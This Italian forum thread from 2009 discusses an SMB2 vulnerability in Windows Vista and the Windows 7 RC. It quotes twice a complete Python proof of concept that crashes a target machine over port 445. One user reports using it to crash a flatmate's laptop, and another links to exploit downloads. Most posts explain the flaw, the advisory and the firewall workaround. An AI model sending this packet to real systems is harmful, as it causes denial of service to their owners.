Torna indietro   Hardware Upgrade Forum > Hardware Upgrade > News

Recensione Samsung Galaxy Z Fold7: un grande salto generazionale
Recensione Samsung Galaxy Z Fold7: un grande salto generazionale
Abbiamo provato per molti giorni il nuovo Z Fold7 di Samsung, un prodotto davvero interessante e costruito nei minimi dettagli. Rispetto al predecessore, cambiano parecchie cose, facendo un salto generazionale importante. Sarà lui il pieghevole di riferimento? Ecco la nostra recensione completa.
The Edge of Fate è Destiny 2.5. E questo è un problema
The Edge of Fate è Destiny 2.5. E questo è un problema
Bungie riesce a costruire una delle campagne più coinvolgenti della serie e introduce cambiamenti profondi al sistema di gioco, tra nuove stat e tier dell’equipaggiamento. Ma con risorse limitate e scelte discutibili, il vero salto evolutivo resta solo un’occasione mancata
Ryzen Threadripper 9980X e 9970X alla prova: AMD Zen 5 al massimo livello
Ryzen Threadripper 9980X e 9970X alla prova: AMD Zen 5 al massimo livello
AMD ha aggiornato l'offerta di CPU HEDT con i Ryzen Threadripper 9000 basati su architettura Zen 5. In questo articolo vediamo come si comportano i modelli con 64 e 32 core 9980X e 9970X. Venduti allo stesso prezzo dei predecessori e compatibili con il medesimo socket, le nuove proposte si candidano a essere ottimi compagni per chi è in cerca di potenza dei calcolo e tante linee PCI Express per workstation grafiche e destinate all'AI.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 10-09-2009, 07:31   #101
SuperSandro
Senior Member
 
L'Avatar di SuperSandro
 
Iscritto dal: Sep 2004
Città: Vicino a Milano
Messaggi: 1913
"il problema colpisce Window 7 Release candidate ma non la versione finale del sistema operativo che è stata completata nel corso del mese di Luglio."
...uhmm... morale: comprate la versione finale e rinunciate a quella semi-gratuita. (della serie "A pensar male si indovina" ).
__________________
Sistema: Asus (Win 10 64 bit, Intel i7, 16 GB RAM) - Samsung Laser ML 2165 - Pentax K20D (+ 3 obbiettivi) - Samsung S9+ - APC Back-UPS RS 800
SuperSandro è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 07:56   #102
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
Quote:
Originariamente inviato da SuperSandro Guarda i messaggi
"il problema colpisce Window 7 Release candidate ma non la versione finale del sistema operativo che è stata completata nel corso del mese di Luglio."
...uhmm... morale: comprate la versione finale e rinunciate a quella semi-gratuita. (della serie "A pensar male si indovina" ).
A tuo avviso quindi non è normale che in una release candidate ci siano bug che sono stati fixati nella versione che è diventata finale?
Spiegatemi questo ragionamento perchè a me certe congetture sono ignote, non ci arrivo.
mjordan è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 08:11   #103
Collision
Senior Member
 
L'Avatar di Collision
 
Iscritto dal: Mar 2006
Messaggi: 2658
Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test!
Collision è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 08:20   #104
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
Quote:
Originariamente inviato da Collision Guarda i messaggi
Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test!
Volevo dirlo anche io ma mi sono limitato, perchè a simili commenti sarebbe meglio rimanere in silenzio.
mjordan è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 08:41   #105
SuperSandro
Senior Member
 
L'Avatar di SuperSandro
 
Iscritto dal: Sep 2004
Città: Vicino a Milano
Messaggi: 1913
Quote:
Originariamente inviato da mjordan Guarda i messaggi
A tuo avviso quindi non è normale che in una release candidate ci siano bug che sono stati fixati nella versione che è diventata finale?
Spiegatemi questo ragionamento perchè a me certe congetture sono ignote, non ci arrivo.
Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).

Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.

Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando?
__________________
Sistema: Asus (Win 10 64 bit, Intel i7, 16 GB RAM) - Samsung Laser ML 2165 - Pentax K20D (+ 3 obbiettivi) - Samsung S9+ - APC Back-UPS RS 800
SuperSandro è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 08:51   #106
robertogl
Senior Member
 
L'Avatar di robertogl
 
Iscritto dal: Sep 2007
Città: Arzignano (VI)
Messaggi: 4229
Quote:
Originariamente inviato da SuperSandro Guarda i messaggi
Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).

Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.

Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando?
probabilmente hanno riscritto il servizio da vista a seven e facendolo il bug è scomparso,magari neanche lo sapevano
robertogl è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 08:57   #107
SuperSandro
Senior Member
 
L'Avatar di SuperSandro
 
Iscritto dal: Sep 2004
Città: Vicino a Milano
Messaggi: 1913
Quote:
Originariamente inviato da robertogl Guarda i messaggi
probabilmente hanno riscritto il servizio da vista a seven e facendolo il bug è scomparso,magari neanche lo sapevano
...della serie "Siamo tutti nelle mani del Signore".
__________________
Sistema: Asus (Win 10 64 bit, Intel i7, 16 GB RAM) - Samsung Laser ML 2165 - Pentax K20D (+ 3 obbiettivi) - Samsung S9+ - APC Back-UPS RS 800
SuperSandro è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 09:19   #108
MiKeLezZ
Senior Member
 
L'Avatar di MiKeLezZ
 
Iscritto dal: Jul 2003
Messaggi: 26788
http://www.microsoft.com/technet/sec...ry/975497.mspx
MiKeLezZ è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 11:43   #109
TexZK
Junior Member
 
Iscritto dal: Jun 2008
Messaggi: 8
Ma nessuno ha notato l'unico (forse) post sensato di tutta la discussione?

Quote:
Originariamente inviato da Simock85 Guarda i messaggi
Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?
Codice:
# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en 
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a 
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.

La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.

Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.
TexZK è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 12:14   #110
Curtis
Bannato
 
Iscritto dal: Aug 2009
Messaggi: 369
Quote:
Originariamente inviato da MiKeLezZ Guarda i messaggi
Workarounds
Block TCP ports 139 and 445 at the firewall

These ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports.


http://www.hwupgrade.it/forum/showpo...8&postcount=84
Quote:
Originariamente inviato da Collision Guarda i messaggi
Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test!
http://www.hwupgrade.it/forum/showpo...4&postcount=81
Curtis è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 12:20   #111
Curtis
Bannato
 
Iscritto dal: Aug 2009
Messaggi: 369
Quote:
Originariamente inviato da MiKeLezZ Guarda i messaggi


Executive Summary
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.



_____________________


Se dovesse venir scoperto che la vulnerabilita' viene exploitata in the wild Microsoft rilascera' subito la patch straordinaria correttiva sia per Vista che per Win7 RC ( la RTM di Win7 come si sa non e' affetta )

Ultima modifica di Curtis : 10-09-2009 alle 12:22.
Curtis è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 12:33   #112
MiKeLezZ
Senior Member
 
L'Avatar di MiKeLezZ
 
Iscritto dal: Jul 2003
Messaggi: 26788
Quote:
Originariamente inviato da Curtis Guarda i messaggi
Executive Summary
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.



_____________________


Se dovesse venir scoperto che la vulnerabilita' viene exploitata in the wild Microsoft rilascera' subito la patch straordinaria correttiva sia per Vista che per Win7 RC ( la RTM di Win7 come si sa non e' affetta )
ah no?
non c'è nessun attacco eh....

http://!!OCIO!!g-laurent.blogspot.co...-protocol.html

http://!!OCIO!!rapidshare.com/files/...ukeV7.zip.html

http://!!OCIO!!rapidshare.com/files/...IONAL.rar.html

http://!!OCIO!!pastie.org/611098

http://!!OCIO!!pastie.org/610829

togliete !!OCIO!! ...
MiKeLezZ è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 12:36   #113
Curtis
Bannato
 
Iscritto dal: Aug 2009
Messaggi: 369
stai col router adls che ha il firewall hardware e l'attacco anche se in the wild ti fa un baffo

il problema e' solo per chi sta in rete col modem usb che come si sa espone direttamente la macchine su internet ed ha pure il firewall di Vista o WIn7 RC disabilitato o le porte Netbios aperte come eccezione
Curtis è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 14:38   #114
tmviet
Senior Member
 
L'Avatar di tmviet
 
Iscritto dal: Jul 2006
Città: Prov. Milano
Messaggi: 1508
IO uso solo windows xp però son sicuro che anche su altri SO se si continua a martellare cosi come lo si fà con windows i bachi si trovano
__________________
Viet Vo dao, uno stile di vita, un'arte marziale
http://www.vietanhmon.org/italiano.htm
tmviet è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 14:43   #115
danlo8600
Senior Member
 
L'Avatar di danlo8600
 
Iscritto dal: Dec 2007
Messaggi: 396
Come al solito il titolo dell'articolo crea il delirio, ma andando ad analizzare affondo la situazione risulta più che chiaro che il sistema operativo vulnerabile è windows vista, comunque leggendo lo script a me non sembra che ci siano grossi rischi per la sicurezza e comunque per essere esposti bisogna veramente essere degli idioti e disattivare di tutto e anche di più... E comunque anche nel caso peggiore dell'idiota di turno non c'è pericolo. Sarei stato curioso di leggere i commenti di questo http://www.geekissimo.com/2008/04/05/mac-os-x-hackerato-piu-velocemente-di-windows-e-linux/
ma penso che ben pochi lo abbiano saputo.
danlo8600 è offline   Rispondi citando il messaggio o parte di esso
Old 10-09-2009, 15:42   #116
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
Quote:
Originariamente inviato da SuperSandro Guarda i messaggi
Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).

Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.

Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando?
Ma chi ha detto che la comunicazione è mancata? Guarda che i bug di Windows non passano per HWUpgrade in forma di notizia in genere
mjordan è offline   Rispondi citando il messaggio o parte di esso
Old 11-09-2009, 22:03   #117
Rizlo+
Senior Member
 
Iscritto dal: Jul 1999
Messaggi: 5492
Quote:
Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?
Codice:
# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.

La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.

Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.
Quotone!! Davvero il post più sensato!
Non mi sembra il caso di dar fiato alle trombe per una vulnerabilità come le tantissime scoperte ogni giorno in tutto il mondo dell'informatica, ed è da idioti sostenere che le vulnerabilità ci sono perchè è stato fatto poco testing e ve lo sta dicendo uno che sui suoi PC non ha più windows da circa 5 anni...
Rizlo+ è offline   Rispondi citando il messaggio o parte di esso
Old 11-09-2009, 22:57   #118
_TeRmInEt_
Senior Member
 
L'Avatar di _TeRmInEt_
 
Iscritto dal: Sep 2004
Città: Rep. San Marino
Messaggi: 633
__________________
|| Do you like sbav?
_TeRmInEt_ è offline   Rispondi citando il messaggio o parte di esso
Old 14-09-2009, 08:06   #119
tmviet
Senior Member
 
L'Avatar di tmviet
 
Iscritto dal: Jul 2006
Città: Prov. Milano
Messaggi: 1508
Sicuramente passerò da xp a window 7 a meno che non cambi pc più performante allora voglio provare Ubuntu
__________________
Viet Vo dao, uno stile di vita, un'arte marziale
http://www.vietanhmon.org/italiano.htm
tmviet è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Recensione Samsung Galaxy Z Fold7: un grande salto generazionale Recensione Samsung Galaxy Z Fold7: un grande sal...
The Edge of Fate è Destiny 2.5. E questo è un problema The Edge of Fate è Destiny 2.5. E questo ...
Ryzen Threadripper 9980X e 9970X alla prova: AMD Zen 5 al massimo livello Ryzen Threadripper 9980X e 9970X alla prova: AMD...
Acer TravelMate P4 14: tanta sostanza per l'utente aziendale Acer TravelMate P4 14: tanta sostanza per l'uten...
Hisense M2 Pro: dove lo metti, sta. Mini proiettore laser 4K per il cinema ovunque Hisense M2 Pro: dove lo metti, sta. Mini proiett...
Identikit della scheda video perfetta, p...
SUV, 100% elettrico e costa meno di un b...
Hai mai caricato un referto su ChatGPT? ...
Apple vuole un nuovo campus nella Silico...
DJI Osmo 360, la nuova action cam a 360&...
Lo strumento anti-requisiti per Windows ...
Utenti di Claude in rivolta: 'I bei vecc...
Rocket Lab Mars Telecommunications Orbit...
NVIDIA GeForce RTX: supporto driver su W...
iliad ha iniziato a vendere smartphone d...
La cinese SatNet ha lanciato un nuovo gr...
Cloud sovrano europeo: a che punto siamo...
The Medium arriverà al cinema gra...
Addio alle faccende domestiche? Il robot...
Fallito il primo lancio del razzo spazia...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 05:01.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v
1